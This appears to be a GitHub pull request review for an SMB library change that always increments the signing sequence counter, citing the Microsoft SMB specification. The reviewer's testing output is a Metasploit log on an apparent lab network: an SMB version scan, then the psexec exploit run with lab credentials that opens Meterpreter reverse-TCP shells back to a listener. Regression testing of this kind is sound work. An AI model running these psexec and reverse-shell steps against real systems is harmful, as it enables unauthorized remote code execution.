Always track sequence counter regardless of having a session key present

[adfoster-r7]

According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c

3. The client builds an SMB_COM_SESSION_SETUP_ANDX request SMB and sends it to the server. ... At this stage, the SessionKey is not yet available. ... After the packet is sent by the client, the sequence number is incremented to 1, which is the expected sequence number for the response packet from the server.

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c#:~:text=The%20client%20builds%20an%20SMB_COM_SESSION_SETUP_ANDX%20request%20SMB%20and%20sends%20it%20to%20the%20server.

[smcintyre-r7]

LGTM, tested with psexec and smb_login from Metasploit.

Testing Output

``` msf6 auxiliary(scanner/smb/smb_version) > run [*] 192.168.159.1:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{9cf46501-404c-4fd9-9708-aa9b1616c591}) (authentication domain:TOR) [*] 192.168.159.11:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:9m 18s) (guid:{dffa5c50-e93d-4753-a4fc-0c698706f4db}) (authentication domain:WIN-9NSI4A6AIHJ) [+] 192.168.159.11:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN-9NSI4A6AIHJ) (workgroup:WORKGROUP) [*] 192.168.159.0/24: - Scanned 26 of 256 hosts (10% complete) [*] 192.168.159.0/24: - Scanned 52 of 256 hosts (20% complete) [*] 192.168.159.0/24: - Scanned 77 of 256 hosts (30% complete) [*] 192.168.159.96:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{696d9eef-5586-401c-accb-133d43cb333e}) (authentication domain:MSFLAB) ^C[*] 192.168.159.0/24: - Caught interrupt from the console... [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/psexec show o [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.250.134 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.159.11 RHOSTS => 192.168.159.11 msf6 exploit(windows/smb/psexec) > set SMBUser smcintyre SMBUser => smcintyre msf6 exploit(windows/smb/psexec) > set SMBPass Password1! SMBPass => Password1! msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 192.168.250.134:4444 [*] 192.168.159.11:445 - Connecting to the server... [*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'... [*] 192.168.159.11:445 - Selecting PowerShell target [*] 192.168.159.11:445 - Executing the payload... [+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.250.237 [*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63414) at 2022-06-15 09:58:26 -0400 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.159.11 - Meterpreter session 1 closed. Reason: User exit msf6 exploit(windows/smb/psexec) > set SMB::ProtocolVersion 1 SMB::ProtocolVersion => 1 msf6 exploit(windows/smb/psexec) > exploit msf6 exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on 192.168.250.134:4444 [*] 192.168.159.11:445 - Connecting to the server... [*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'... [*] 192.168.159.11:445 - Selecting PowerShell target [*] 192.168.159.11:445 - Executing the payload... [+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.250.237 [*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:56247) at 2022-06-15 09:59:53 -0400 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.159.11 - Meterpreter session 2 closed. Reason: User exit msf6 exploit(windows/smb/psexec) > ```